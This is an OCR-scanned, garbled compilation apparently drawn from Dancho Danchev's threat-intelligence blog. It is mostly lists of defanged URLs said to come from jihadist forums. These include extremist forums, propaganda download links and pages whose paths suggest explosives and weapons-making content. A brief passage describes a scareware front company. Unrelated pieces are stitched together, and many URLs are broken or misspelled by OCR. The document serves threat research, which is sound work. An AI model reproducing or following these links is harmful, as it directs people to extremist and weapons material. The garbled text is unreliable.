hxxp://www.aljazeera.net/NR/exeres/2 798469E-8290-4C1A-9560-51AEBFCBO9BA.htm 
hxxp://www.alarabiya.net/LatestNews.aspx 
hxxp://www.islamonline.net/arabic/index.shtml 
hxxp://www.palestine-info.info/arabic/index.shtml 
hxxp://www.qoqaznews.com/ 
hxxp://www.sabiroon.org/ 
hxxp://www.islammemo.cc/ 
hxxp://www.bashaer.info/ 

hxxp://www.al-asra.org/ 
hxxp://www.kashmiruna.org/ 
hxxp://www.muslimuzbekistan.com/arb/arabic.htm 
hxxp://www.ayobi.com/ 
hxxp://www.chechenonline.com/ 
hxxp://www.chechan.org/ 
hxxp://www.islamicnews.net/ 
hxxp://www.islamicnews.org/arabic/index.html 
hxxp://www.isl.org.uk/ 

hxxp://www.rabitah.net/ 
hxxp://www.eu-islam.com/ 
hxxp://www.achabibah.com/ 


hxxp://www.76news.net/ 
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hxxp://www.alsanam.net/ 
hxxp://www.ourpal.cjb.net/ 
hxxp://www.elasra.net/ 
hxxp://www.palestinehistory.com/arabic/ 
hxxp://www.whyusa.net/arabic/index.php 
hxxp://www.kate3.com/ 

hxxp://www. palintefada.com/arabic/index.php 
hxxp://abu-qatada.com/r?i=832 
hxxp://www.islamlight.net/fllojah/ 
hxxp://saaid.net/mktarat/flasteen/index.htm 
hxxp://www.islahi.net/ 
hxxp://abu-qatada.com/c?i=124 
hxxp://www.iraqpatrol.com/index.php 
hxxp://www.alaqsa-online.net/ 
hxxp://www.hizb-ut-tahrir.org/ 
hxxp://www.islamtoday.net/iraq/main.cfm 
hxxp://www.4alquds.com/ 
hxxp://www.fis-info.net/ 
hxxp://www.haramainj.net/ 
hxxp://saaid.net/mktarat/irag/index.htm 
hxxp://www.qudsnews.net/ 
hxxp://www.palestine-info.info/arabic/namas/ 
hxxp://www.khayma.com/jazira/ 
hxxp://www.alhesbah.info/nephp/up/pafiledb.php?action=category &id=1 
hxxp://www.alqassam.info/ 
hxxp://www.shareeah.org/arabic/ 
hxxp://www.hostinganime.com/host7/ 
hxxp://www.iraqvictims.com/ar home.asp 
hxxp://www.qudsway.com/ 
hxxp://www.almugatila.com/ 
hxxp://www.22lajnah22.co.uk/sound/albumdisplay?albumid=39 
hxxp://www.mobile4trad.com/ 
hxxp://www.khayma.com/alyubroodi/ 
hxxp://www.22lajnah22.co.uk/sound/albumlist?gid=2 
hxxp://www.kataebaqsa.org/arabic/index.php 
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hxxp://www.22lajnah22.co.uk/sound/albumlist?gid=1 
hxxp://www.22lajnah22.co.uk/sound/albumlist?gid=3 
hxxp://www.22lajnah22.co.uk/sound/albumlist?gid=11 
hxxp://abu-qatada.com/c?i=4 
hxxp://www.taiba-gold.com 
hxxp://www.ashefaa.com/files/flash.html 
hxxp://saaid.net/flash/index.htm 
hxxp://www.ashefaa.com/files/enshad.html 
hxxp://www.anashed.net/anashed/ 
hxxp://dawah.ws/show _flash.php 
hxxp://www.twbh.com/flash.php?page=0 
hxxp://www.alboaba.8m.net/albooaba.htm 
hxxp://www.mojahedun.com/flash/index.htm 
hxxp://www.emarati.com/anashed.htm 
hxxp://www.enshad.net/ 
hxxp://www.anashed.net/anashed/flashat.html 
hxxp://www.awrak.com/home/?p=flash 
hxxp://www.asunnah.net/index.php?option=content &task=section &id=12 &ltemid=78 
hxxp://www.emanway.com/con/show _anasheed.php 
hxxp://www.almojaded.org/cards 
hxxp://awam.motken.com/ 
hxxp://www.amwaaj.net 
hxxp://www.muslimz.com/vcard/ 
hxxp://d3wah.com/ 
hxxp://www.twbh.com/sounds.php?topic=2 &page=0 
hxxp://www.inshad.net/fourm/ 
hxxp://www.sahab.ws/5289/ 
hxxp://www.alhakekah.com/ 
hxxp://www.hiddenworlds.info/ 
hxxp://abu-qatada.com/c?i=81 
hxxp://abu-qatada.com/c?i=83 
hxxp://www.allahmhba.com/ 
hxxp://www.alargam.com/prove/jews/jews.htm 
hxxp://www.alabadyah.net/vp/ 
hxxp://www.dhr12.com/ 
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hxxp://www.tawdeeh.com/ 

hxxp://abu-qatada.com/c?i=87 

hxxp://www.ansar.org/ 

hxxp://4christian.8m.com/index.htm 
hxxp://www.antihabashis.com/index2.htm 
hxxp://islamicweb.com/arabic/shia/ 
hxxp://www.newmuslims.tk/ 
hxxp://www.go.ae/kalwid/ketab.htm 
hxxp://www.alsoufia.com/s/index.php?m=1 
hxxp://www.albrhan.com/aashora/ 

hxxp://www.trutheye.com/ 
hxxp://www.khayma.com/internetclinic/yahodman.htm 
hxxp://www.islamlight.net/araa/ 

hxxp://www.albainah.net/ 

hxxp://tanseer.jeeran.com/ 
hxxp://meltingpot.fortunecity.com/seymour/153/books/fatwa/kufralyahood.htm 
hxxp://mypage.ayna.com/nusairee/index.htm 
hxxp://www.wylsh.com/ 
hxxp://arabic.islamicweb.com/christianity/ 
hxxp://www.khayma.com/kshf/M/Drooz.htm 
hxxp://abu-qatada.com/c?i=110 
hxxp://abu-qatada.com/c?i=90 
hxxp://www.islampedia.com/MIE2/maws/maws10.html #hindu 
hxxp://www.almjos.com/ 
hxxp://www.islampedia.com/MIE2/maws/maws5.html #communism 
hxxp://www.feraq.com/ 

hxxp://www.seheb.net/index.php 
hxxp://www.ashefaa.com/files/sh _1.html 
hxxp://akhbar.khayma.com/modules.php?name=Content &pa=showpage &pid=22 
hxxp://www.faisall.com/javas.htm 
hxxp://www.ashefaa.com/files/sh _2.html 
hxxp://www.thecounter.com/ 

hxxp://www.ashefaa.com/files/sh _5.html 
hxxp://www.ashefaa.com/files/sh _6.html 
hxxp://Idap.maktoob.com/arabicF.pl?mm=53195 

24550 


hxxp://www.f3f3.com/go.php?links id=802 


hxxp://www.alshroq1.com/aldars1.htm 


hxxp://www.islamicsupport.net/htmlfiles/islamic _gallary.shtml 


hxxp://login.ayna.com/ 
hxxp://www.f3f3.com/go.php?links id=801 
hxxp://www.alshroq1.com/ashabmwagqai.htm 
hxxp://www.ashefaa.com/files/sh _9.html 
hxxp://gawab.com/webfront/main.php 
hxxp://www.ashefaa.com/files/kaleeb.html 
hxxp://www.ashefaa.com/files/sh _7.html 
hxxp://ghazi.arabia.com/index.php/arabic/mail/ 
hxxp://www.ashefaa.com/files/sh _8.html 


hxxp://www.ashefaa.com/files/sh _4.html 


hxxp://www.islam-online.net/Membership/Arabic/Registration.asp 


hxxp://www.t1t.net/43.htm 
hxxp://www.ashefaa.com/files/adab.html 
hxxp://www.sahab.cc/ 
hxxp://www.wxnwx.com/xxxx.htm 


hxxp://mohammmed.s5.com/ 


hxxp://www.gawab.com/arregister.html?privatedomain=liveislam.COM 


hxxp://www.ashefaa.com/files/bahas.html 
hxxp://sms.islamweb.net:8080/sms/index.htm 
hxxp://login.naseej.com/servlet/LoginCenter?service=email 
hxxp://elaqsa.2islam.com/Explo/1.html 
hxxp://elaqsa.2islam.com/thakfi/osama.html 
hxxp://elaqsa.2islam.com/thakfi/masaed.html 
hxxp://www.karate4arab.com/Links.html 
hxxp://elaqsa.2islam.com/Explo/2.html 
hxxp://www.angelfire.com/ok5/mojahdnet/shabah.htm 
hxxp://elaqsa.2islam.com/thakfi/edad.html 
hxxp://www.aljassir.com/silatar/result.php?table=master 
hxxp://elaqsa.2islam.com/Explo/3.html 
hxxp://www.angelfire.com/ok5/mojahdnet/m4.htm 


hxxp://elaqsa.2islam.com/thakfi/edad1.html 


hxxp://nssaf.com/modules.php?name=News Gfile=article &sid=33 
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hxxp://elaqsa.2islam.com/Explo/4.html 
hxxp://www.angelfire.com/ok5/mojahdnet/gun.htm 
hxxp://elaqsa.2islam.com/thakfi/edad2.htm| 
hxxp://www.karate4arab.com/Taekwondo/ 
hxxp://elaqsa.2islam.com/Explo/5.html 
hxxp://www.angelfire.com/ok5/mojahdnet/sena3ah-rasas.htm 
hxxp://elaqsa.2islam.com/thakfi/quds.html 
hxxp://www.karate4arab.com/vb/forumdisplay.php?forumid=18 
hxxp://elaqsa.2islam.com/Explo/6.html 
hxxp://www.angelfire.com/ok5/mojahdnet/anwa3 _rasas.htm 
hxxp://elaqsa.2islam.com/thakfi/maalem.html 
hxxp://elaqsa.2islam.com/Explo/7.html 
hxxp://www.angelfire.com/ok5/mojahdnet/katm.htm 
hxxp://elaqsa.2islam.com/thakfi/befor.html 
hxxp://www.saaid.net/Doat/ahdal/44.htm 
hxxp://elaqsa.2islam.com/Explo/8.html 
hxxp://www.bbc.co.uk/arabic/specials/militaryfactfile/ 
hxxp://www.jehadakmatloob.jeeran.com/fekeh.al-jehad/fekeh _al-jehad _hokmh.html 
hxxp://elaqsa.2islam.com/Explo/9.html 
hxxp://abu-qatada.com/c?i=173 
hxxp://abu-qatada.com/c?i=39 
hxxp://www.geocities.com/asakher8/KOTB.htm 
hxxp://www.mogqatel.com/openshare/indexf.html 
hxxp://al3dad.jeeran.com/new page _11.htm 
hxxp://al3dad.jeeran.com/new _page _12.htm 
hxxp://abu-qatada.com/c?i=31 
hxxp://al3dad.jeeran.com/new page _23.htm 
hxxp://al3dad.jeeran.com/new page _28.htm 
hxxp://www.ratteb.com/ashefaa.com 
hxxp://www.ratteb.com/yarabb1.php?id=1460 
hxxp://www.geocities.com/arkanalmo/alshohada.htm 
hxxp://www.geocities.com/asakher8/ 
hxxp://www.angelfire.com/ok5/mojahdnet/show.htm 
hxxp://www.angelfire.com/ok5/mojahdnet/move.htm 
hxxp://www.geocities.com/asakher8/pictur.htm 
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McAfee Secure helps keep you safe from identity theft, 
credit card fraud, spyware, spam, viruses and online scams. 


& Attention Merchants 
oy Stay safe from online threats 


One of the latest front-ends to scareware affiliate networks is AK Network Commerce Ltd 
(ak-networkcommerce .com) : 


"Implementing latest anti-hacker technology based on expert and user reviews AK Net- 
work Commerce Ltd enables hacker-proof defense, blocks unauthorized access to your private 
information, and hides your identity. Having combined latest features of cutting-edge privacy 
protection technologies our knowledgeable team designed products to easily and effectively 
fight perilous cyber attempts. Thorough selection and step-by-step application of elements 
and tools required for comprehensive protection of your personal data helped us achieve 
success and become industry leading representatives. We did our best to prove that the time 
has come to leave behind worries about private data theft." 


The company is the very latest attempt of a bogus company to build legitimacy into 
their "/Jatest anti-hacker technology". Meanwhile, the blacklisting , sample distribution, and 
shutting down the scareware domains not only undermines the effectiveness of their largely 
centralized malware campaigns, costs them missed revenue projections, but also, it increases 
the opportunity costs for the gang. 


Related posts: 
[1]A Diverse Portfolio of Fake Security Software - Part Twenty Two 
[2]A Diverse Portfolio of Fake Security Software - Part Twenty One 
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hxxp://www.albasrah.net/media/sound/falluja.htm 
hxxp://www.abolkhaseb.net/images/3loj/index.htm 
hxxp://english.aljazeera.net/NR/exeres/27443B09-A712-4091-9C46-2F8A1F4D2640.h tm 
hxxp://www.taiba-gold.com 
hxxp://www.zimas.5gigs.com/vb/ 
hxxp://www.alhesbah.info/images/ 
hxxp://members.hostedscripts.com/top.cgi?user=topislam 
hxxp://members.hostedscripts.com/top.cgi?user=222 
hxxp://members.hostedscripts.com/top.cgi?user=0000 
hxxp://members.hostedscripts.com/top.cgi?user=4 
hxxp://www.zimas.5gigs.com 
hxxp://www.alchahed.net/ 
hxxp://www.55a.net/169.htm 
hxxp://www.alnabee.com/Sunna/tamour.htm 
hxxp://www.khayma.com/hawaj/ 
hxxp://www.geocities.com/TIBNABAWI/ 
hxxp://www.thingsnotsaid.org/higama _index.htm 
hxxp://www.islamiyyat.com/black _seed.htm 
hxxp://www.science4islam.com/html/1-2-08a.html 
hxxp://www.khayma.com/roqia/ 
hxxp://www.islamset.com/arabic/ahip/practice/ragay.html 
hxxp://www.amaneena.com/m/113.htm 
hxxp://www.iraqgate.net/media/scientific-gate/scientific3.htm 
hxxp://www.alrogia.com/ 
hxxp://ruqya.net/how.html 
hxxp://www.islampedia.com/MIE2/MainInter/default.htm 
hxxp://www.dr-sh.com/ar/ 
hxxp://www.sehha.com/ 
hxxp://www.ashefaa.com/files/index.html 
hxxp://www.mogahid.com/files/islam.html 
hxxp://www.binbaz.org.sa/index.asp?t=Ayat &currec=0 &Action=fwd 
hxxp://www.binothaimeen.com/cgi-bin/enews/viewnews.cgi?category=7 &id=1015018447 
hxxp://fegh.al-islam.com/ 
hxxp://abu-qatada.com/r?i=1593 
hxxp://samaway.host.sk/default.php 
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hxxp://www. binothaimeen.com/cgi-bin/enews/viewnews.cgi?category=7 &id=1015018492 
hxxp://www.saaid.net/rasael/r39.htm 

hxxp://abu-qatada.com/r?i=2491 

hxxp://www.hqw7.com/main.htm 

hxxp://www.elafco.com/nwa-1.htm 

hxxp://www.awkaf.net/mousoaa/index.html 


hxxp://www.sahab.com/go/forumdisplay.php?s=aa7d594d8978eab46beec19973f02517 &fo- 
rumid=23 


hxxp://www.qassimy.com/qoraankaream.htm 

hxxp://www.tihamah.net/hadith.php?get=1 &Doc=0 &n=0 

hxxp://www.kantakji.org/ 

hxxp://www. binothaimeen.com/cgi-bin/books/viewnews.cgi?category=5 &id=1016350279 
hxxp://www.quranway.net/Library/bviewer.asp?Filelype=1 &fld=28 
hxxp://www.islampedia.com/MIE2/o0loom/HADITHDX.html 

hxxp://history.al-islam.com/ 

hxxp://www. binothaimeen.com/cgi-bin/books/viewnews.cgi?category=5 &id=1016351465 
hxxp://www.reeem.com/quran/ 
hxxp://www.alhikmeh.com/arabic/akhlaq/ahadith/index.htm 

hxxp://www. binothaimeen.com/cgi-bin/books/viewnews.cgi?category=5 &id=1016349080 
hxxp://www.deentimes.com/ 

hxxp://www.al-eman.com/Islamlib/eberror.asp 
hxxp://www.kl28.com/books/showbook.php?bID=13 &pNo=5 
hxxp://www.alhesbah.com/v/ 

hxxp://www.goafalaladyn.com/vb/index.php 
hxxp://www.nnuu.org/vb/forumdisplay. php?f=2 

hxxp://www.islamcorp.net/forum/ 

hxxp://www.al-saf.net/vb/ 

hxxp://qa3edoon.100free.com/ 


hxxp://www.islamic-f.net/vb/forumdisplay.php?s=6d68031979e66c7e7a6e05538935 2156 
&f=2 


hxxp://www.shababnaa.com/vb/ 

hxxp://www. bayanat.info/index.php? 
hxxp://www.albadil.ru.tc/ 
hxxp://www.majdah.com/vb/forumdisplay.php?f=37 
hxxp://www.mojahedon.com/index/ 
hxxp://www.alsakifah.org/vb/forumdisplay.php?f=41 
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hxxp://www.alnorl.com/index.php?s=478c18a55c1l00bf862c650ff2c911b1d &showforum=2 


hxxp://al7aq.cjb.net/ 
hxxp://www.alommh.net/forums/ 
hxxp://www.almeer.net/vb/forumdisplay.php?f=44 
hxxp://www.minbar-islam.com/forum/ 
hxxp://www.soutweb.nel.net/ 
hxxp://www.khilafah.net/index.php 


hxxp://www.shamela.net/vb/forumdisplay.php?s=laaafb905589081590fe075e94cf31 
&f=93 


hxxp://forums.cjb.net/jehaadegypt.html 
hxxp://www.al-faroug.com/vb/ 
hxxp://www.alokab.com/ 
hxxp://www.alhadba.com/vb/index.php 
hxxp://jihadweb.5gigs.com/home.htm 
hxxp://www.anbaar.net/phpbb/viewforum.php?f=21 
hxxp://abu-qatada.com/i 
hxxp://asia.geocities.com/mohajerlb/ 
hxxp://hussamaldin.jeeran.com/ 


15 


hxxp://www.asunnah.net/index.php?option=com _simpleboard &ltemid=85 &func=showcat 


&catid=2 
hxxp://www.eqla3.gwgaming.net/vbb/ 


hxxp://www.alnusra.net 
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Folks, 


Here’s the second batch of URLs found on publicly accessible cyber jihad forums which | 
obtained using technical collection. 


Sample URLs found on publicly accessible cyber jihad forums include: 


hxxp://w-n-n.com/external.php?forumids=10 

hxxp://w-n-n.com 

hxxp://w-n-n.com/showthread.php?t=31959 & #038;goto=newpost 
hxxp://w-n-n.com/showthread.php?t=31753 & #038;goto=newpost 
hxxp://w-n-n.com/showthread.php?t=31669 & #038;goto=newpost 
hxxp://w-n-n.com/showthread.php?t=31611 & #038;goto=newpost 
hxxp://w-n-n.com/showthread.php?t=31606 & #038;goto=newpost 
hxxp://w-n-n.com/showthread.php?t=31557 & #038;goto=newpost 
hxxp://w-n-n.com/showthread.php?t=31423 & #038;goto=newpost 
hxxp://w-n-n.com/showthread.php?t=31375 & #038;goto=newpost 
hxxp://w-n-n.com/showthread.php?t=30938 & #038;goto=newpost 
hxxp://w-n-n.com/showthread.php?t=30828 & #038;goto=newpost 
hxxp://www.ribaat.org/ 

hxxp://www.qmagreb.org/ 

hxxp://www.aswj.eu/ 

hxxp://www.camagat.com/engilisce/albeti eng.htm 
hxxp://caravansofmartyrs.atspace.com/index.html 
hxxp://blog.darulislam.info/ 

hxxp://aloattarmedia.wordpress.com/ 

hxxp://imam-web.com/ 

hxxp://www.|IslamicThinkers.com 

hxxp://d. lasphost.com/Tawheedjihad/ 
hxxp://www.witness-pioneer.org/vil/nadeeth/riyad/11/book11.htm 
hxxp://www.sawtaljihad.org/ 

hxxp://www.ansar-jihad.net/ 

hxxp://islamicirag.modawanati.com/ 

hxxp://www.altafsir.com 
hxxp://www.islamibayanaat.com/EnglishMarefulQuran.htm 
hxxp://madinaharabic.com 

hxxp://www.geocities.com/tafsir ibn _kathir/ 
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hxxp://www.theholybook.org/en/tafsir _%FDbn _kathi/c.4830.html 
hxxp://abuqutaybah.blogspot.com/ 
hxxp://almuwahideen.blogspot.com/ 
hxxp://clearblogs.com/AllAboutGQ/ 
hxxp://killerapathy.blogspot.com/ 
hxxp://arabicgems.wordpress.com 
hxxp://abushabaab.wordpress.com/ 
hxxp://caravanofmartyrs.wordpress.com/ 
hxxp://www.crusaderwatcher.blogspot.com/ 
hxxp://oneofmany.wordpress.com/ 
hxxp://hijrafeesabilillah.blogspot.com/ 
hxxp://feesabeelillah.blogspot.com 
hxxp://abusayfullaah.wordpress.com/ 
hxxp://mujahidfisabeelillah.wordpress.com/ 
hxxp://millatibraheem.muslimpad.com/ 
hxxp://muslimsinkenya.wordpress.com/ 
hxxp://naseeha.wordpress.com/ 
hxxp://amatullah51.wordpress.com/ 
hxxp://ackie00.blogspot.com/ 
hxxp://www.xanga.com/Servant _of Allah 
hxxp://www.shiaexposed.blogspot.com/ 
hxxp://muwahidah.muslimpad.com/ 
hxxp://ummtayyab.com/ 
hxxp://truthline.wordpress.com/ 
hxxp://yousefalkhattab. blogspot.com/ 
hxxp://alkarnee.wordpress.com/tag/english-section/ 
hxxp://iraqsawthaq.blogspot.com/ 
hxxp://amreekan.wordpress.com/ 
hxxp://tibyaan.atspace.com/tibyaan/index-2.html 
hxxp://darulislam.info/ 
hxxp://islamicawakening.com/ 
hxxp://www.islamic-awareness.org/ 
hxxp://www.islaam.net 
hxxp://salafiyyah-jadeedah.tripod.com/ 


hxxp://www.sa7aba.net/ 
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hxxp://www.sunnahonline.com 
hxxp://www.turntoislam.com/ 

hxxp://maktabah.net/ 
hxxp://s15.invisionfree.com/jaysh _alansar/index.php?act=idx 
hxxp://darulislam.info/forum/index.php 
hxxp://www.hijra.net/forum/ 
hxxp://forums.islamicawakening.com/ 
hxxp://talk.islamicnetwork.com/ 
hxxp://islamicthinkers.com/forum/index.php? 
hxxp://www.leemedia.net/index.php 
hxxp://pearls-of-jannah.com/ 
hxxp://www.alfirdaws.org/vb/index.php 
hxxp://www.al-faloja.com/vb/ 
hxxp://www.islamic-f.net/vb/ 
hxxp://www.alhesbah.org/v/ 
hxxp://www.alnusra.net/vb/ 
hxxp://www.ekhlaas.org/forum/index.php 
hxxp://www.abo-ali.com/ 

hxxp://almujahideen.com/ 
hxxp://www.at-taifahstudios.com/ 
hxxp://hidayahonline.org/?page=audio 
hxxp://www.islambase.co.uk/ 
hxxp://www.islamicvideos.net/ 
hxxp://nasheed.worldofislam.info/ 
hxxp://kalamullah.com/ 
hxxp://www.labayk-media.net/pic/ 
hxxp://www.streetdawah.org 

hxxp://www.albasrah.net 

hxxp://www.alemarah.org/ 
hxxp://www.whitehouse.gov/news/releases/2006/10/20061011-5.html 
hxxp://www.msnbc.msn.com/id/15239205/site/newsweek/ 
hxxp://www.cageprisoners.com/ 
hxxp://76news.net/eng/ 
hxxp://www.freewebtown.com/english2007/english.htm 


hxxp://www.kavkazcenter.com 
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hxxp://www.menmritv.org 

hxxp://qaadisiya.com/ 

hxxp://www.shabelle.net/news/english.htm 

hxxp://w-n-n.net 

hxxp://www.worldlingo.com/en/products _services/worldlingo _translator.html 
hxxp://worldofislam.info/ 

hxxp://www.fileflyer.com/view/znXkLB7 
hxxp://www.sendspace.com/file/xkaxq1 
hxxp://depositfiles.com/files/1404066 


hxxp://www.mercuryupload.com/media/download.php?file=62b8cfObfo50b3ec2983e8 
52fb6126f2 


hxxp://public.box.net/tough1357142 

hxxp://www.badongo.com/file/3950460 

hxxp://www.megaupload.com/?d=IHF66HBI 

hxxp://www.binarymoon.co.uk/ 

hxxp://stats.wordpress.com/w.js?8 

hxxp://inshallanshaheed.wordpress.com/ 

hxxp://thinking-islaam.blogspot.com 
hxxp://www.abo-ali.com/index.php?pg=nasheed 

hxxp://green-birds.blogspot.com/ 

hxxp://www.sendspace.com/file/d4fays 

hxxp://www.ansaralsunnah.2truth.com 

hxxp://www.as-sabiqoon.com 

hxxp://www.google.com 

hxxp://www.mwaheb.net/mw/mhnds/gehad/ 

hxxp://www.al-imam.net/anasheed.htm 
hxxp://nadeem.lightuponlight.com/indexislamicsongs.html 
hxxp://d.turboupload.com/d/750237/The Constants of Jihad Lecture _1.mp3.html 
hxxp://d.turboupload.com/d/750342/The Constants of Jihad Lecture _2.mp3.html 
hxxp://d.turboupload.com/d/750587/The Constants of Jihad Lecture _3.mp3.html 
hxxp://d.turboupload.com/d/750641/The Constants of Jihad Lecture _4.mp3.html 
hxxp://d.turboupload.com/d/751391/The Constants of Jihad Lecture 5.mp3.html 
hxxp://d.turboupload.com/d/751450/The Constants of Jihad Lecture _6.mp3.html 
hxxp://d.turboupload.com/d/441155/AllChaptersPDF.pdf.html 
hxxp://d.turboupload.com/d/441147/All Chapters.doc.html 
hxxp://www.freewebs.com/tawheedpubs 


24559 


hxxp://ahlul-kahf313.blogspot.com 
hxxp://www.al-jihad.co.nr 
hxxp://abusayfullaah.wordpress.com 
hxxp://www.islambase.com 


hxxp://d.turboupload.com/d/389087/Mashari _Al-Ashwaq 
_notes.doc.html 


hxxp://SunniSideUp.blogspot.com/ 
hxxp://www.cageprisoners.com: 
hxxp://www.themercifulgroup.tk 
hxxp://www.globusz.com/ebooks/Milestone/O0000010.htm 
hxxp://www.gawaher.com/index.php?showtopic=5869 
hxxp://nadeem.lightuponlight.com 
hxxp://www.islambase.co.uk 

hxxp://surl.se/cnnr 

hxxp://surl.se/cnns 
hxxp://www.badongo.com/vid/441925 
hxxp://depositfiles.com/files/1410139 
hxxp://depositfiles.com/files/1412757 
hxxp://depositfiles.com/files/1412723 
hxxp://www.sendspace.com/file/3vjban 
hxxp://www.fileflyer.com/view/X1uzAAD 
hxxp://www.fileflyer.com/view/K7HtFCO 
hxxp://www.fileflyer.com/view/Q2JWDAu 
hxxp://www.megaupload.com/?d=5IL8B40W 
hxxp://www.megaupload.com/?d=UT3VI7LV 
hxxp://www.megaupload.com/?d=DB777QSO0 
hxxp://www.megaupload.com/?d=YHZB2UZF 
hxxp://www.megaupload.com/?d=GEQIFSY7 
hxxp://www.megaupload.com/?d=YFVOLXDP 
hxxp://www.megaupload.com/?d=JUDMQUH6 
hxxp://uploadpalace.com/en/file/849 7/anq1-avi.html 
hxxp://uploadpalace.com/en/file/8505/anq1-avi.html 
hxxp://uploadpalace.com/en/file/8506/anq1-avi.html 
hxxp://uploadpalace.com/en/file/8498/anq1-avi.html 
hxxp://uploadpalace.com/en/file/845 7/anq1-avi.html 
hxxp://www.fileblob.com/download.php?id=2ECA1CE1 
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hxxp://www.fileblob.com/download.php?id=6F5CD8D8 
hxxp://www.fileblob.com/download.php?id=D407AD58 
hxxp://www.fileblob.com/download.php?id=4774CE74 
hxxp://download.file2you.net/ytgjajyjxddg/anql.avi.html 
hxxp://download.file2you.net/jowx4tdryhgt/angl.avi.html 
hxxp://download.file2you.net/76a9zyfknerb/anq1.avi.html 
hxxp://download.file2you.net/yvwfpxb2hnje/anq1.avi.html 
hxxp://www.megafileupload.com/en/fil.../anql-avi.html 
hxxp://www.webfilehost.com/?mode=viewupload &amp;id=538895 
hxxp://www.webfilehost.com/?mode=viewupload &amp;id=6150375 
hxxp://www.webfilehost.com/?mode=viewupload &amp;id=4243720 
hxxp://www.webfilehost.com/?mode=viewupload &amp;id=2988085 
hxxp://www.uploadcomet.com/download....7d10882968fefa 
hxxp://www.upload.pk/freeupload/down...7d10882968fefa 
hxxp://www.mercuryupload.com/media/d...7d10882968fefa 
hxxp://xrl.us/3tp4 

hxxp://depositfiles.com/files/1410137 
hxxp://depositfiles.com/files/1412659 
hxxp://www.sendspace.com/file/I8tifr 
hxxp://www.sendspace.com/file/rvsyj9 
hxxp://www.sendspace.com/file/vlycv1 
hxxp://www.badongo.com/file/3958848 
hxxp://www.badongo.com/file/3959835 
hxxp://www.badongo.com/file/3959448 
hxxp://www.badongo.com/file/3958192 
hxxp://www.sendspace.com/file/yyq7f8 
hxxp://www.sendspace.com/file/2y8uon 
hxxp://www.fileflyer.com/view/FUkaCBz 
hxxp://www.fileflyer.com/view/xWG8nBA 
hxxp://www.megaupload.com/?d=R67SL8V9 
hxxp://www.megaupload.com/?d=52IJNRRE 
hxxp://www.megaupload.com/?d=NQIL15EZ 
hxxp://www.megaupload.com/?d=PFK1480Y 
hxxp://www.megaupload.com/?d=4BGAPQ3K 
hxxp://www.megaupload.com/?d=T9R2FVKS 
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hxxp://www.megaupload.com/?d=HAPUUKOF 
hxxp://www.megaupload.com/?d=WFOAPCDB 
hxxp://www. savefile.info/file/3467/anq2-rmvb.html 
hxxp://www. savefile.info/file/3468/anq2-rmvb.html 
hxxp://www. savefile.info/file/3475/anq2-rmvb.html 
hxxp://www.savefile.info/file/3478/anq2-rmvb.html 
hxxp://www. savefile.info/file/3479/anq2-rmvb.html 
hxxp://4filehosting.com/file/55336/anq2-rmvb.html 
hxxp://4filehosting.com/file/55335/anq2-rmvb.html 
hxxp://www. savefile.info/file/3456/anq2-rmvb.html 
hxxp://4filehosting.com/file/55405/aweeee-zip.html 
hxxp://www.zshare.net/download/3005323714f6c6/ 
hxxp://www.zshare.net/download/300586740ad143/ 
hxxp://www.zshare.net/download/3004517cf0e643/ 
hxxp://www.zshare.net/download/300334602cc0b2/ 
hxxp://picshome.com/download.php?id=102A88911 
hxxp://picshome.com/download.php?id=283596EE1 
hxxp://4filehosting.com/file/55451/q2w3333-zip.htm| 
hxxp://picshome.com/download.php?id=4BE700641 
hxxp://www.upitus.com/download.php?file=f891f4ad 
hxxp://www.upitus.com/download.php?file=a4f2189a 
hxxp://www.upitus.com/download.php?file=70a975d8 
hxxp://www.upitus.com/download.php?file=2b364e43 
hxxp://www.upitus.com/download.php?file=426bd7dc 
hxxp://www.upitus.com/download.php?file=59c7ead2 
hxxp://www.upitus.com/download.php?file=78b106bc 
hxxp://www.upitus.com/download.php?file=fd994b5d 
hxxp://www.upitus.com/download.php?file=0f9683e7 
hxxp://www.upitus.com/download.php?file=1dbcef42 
hxxp://www.upitus.com/download.php?file=b09celca 
hxxp://www.fileblob.com/download.php?id=D19F52AE 
hxxp://www.fileblob.com/download.php?id=1448B183 
hxxp://www.fileblob.com/download.php?id=27B339E6 
hxxp://rapidshare.com/files/47276098/anq2.rmvb.html 
hxxp://rapidshare.com/files/47272951/anq2.rmvb.html 
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[3]A Diverse Portfolio of Fake Security Software - Part Twenty 
[4]A Diverse Portfolio of Fake Security Software - Part Nineteen 
[5]A Diverse Portfolio of Fake Security Software - Part Eighteen 
[6]A Diverse Portfolio of Fake Security Software - Part Seventeen 
[7]A Diverse Portfolio of Fake Security Software - Part Sixteen 
[8]A Diverse Portfolio of Fake Security Software - Part Fifteen 
[9]A Diverse Portfolio of Fake Security Software - Part Fourteen 
[10]A Diverse Portfolio of Fake Security Software - Part Thirteen 
[11]A Diverse Portfolio of Fake Security Software - Part Twelve 
[12]A Diverse Portfolio of Fake Security Software - Part Eleven 
[13]A Diverse Portfolio of Fake Security Software - Part Ten 
[14]A Diverse Portfolio of Fake Security Software - Part Nine 
[15]A Diverse Portfolio of Fake Security Software - Part Eight 
[16]A Diverse Portfolio of Fake Security Software - Part Seven 
[17]A Diverse Portfolio of Fake Security Software - Part Six 
[18]A Diverse Portfolio of Fake Security Software - Part Five 
[19]A Diverse Portfolio of Fake Security Software - Part Four 
[20]A Diverse Portfolio of Fake Security Software - Part Three 
[21]A Diverse Portfolio of Fake Security Software - Part Two 
[22]Diverse Portfolio of Fake Security Software 


This post has been reproduced from [23]Dancho Danchev’s blog. 


. http://ddanchev. blogspot .com/2009/07/diverse-portfolio-of-fake-security. html 
. http: //ddanchev. blogspot . com/2009/06/diverse-portfolio-of-fake-security.htm 
. http: //ddanchev.blogspot.com/2009/05/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2009/04/diverse-portfolio-of-fake-security_16.html 


. http: //ddanchev.blogspot .com/2009/04/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev.blogspot.com/2009/03/diverse-portfolio-of-fake-security_31.htm 


. http: //ddanchev. blogspot .com/2009/03/diverse-portfolio-of-fake-security.htm 
. http: //ddanchev. blogspot .com/2009/02/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev .blogspot.com/2009/01/diverse-portfolio-of-fake-security.htm 


ttp://ddanchev. blogspot .com/2008/11/diverse-portfolio-of-fake-security_12.htm 
_hvtp://Adanchev. blogspot con/2008/11/daverse-portfclio=of-fake- security hal 

ttp://ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_28.htm 
ttp://ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_22.htm 
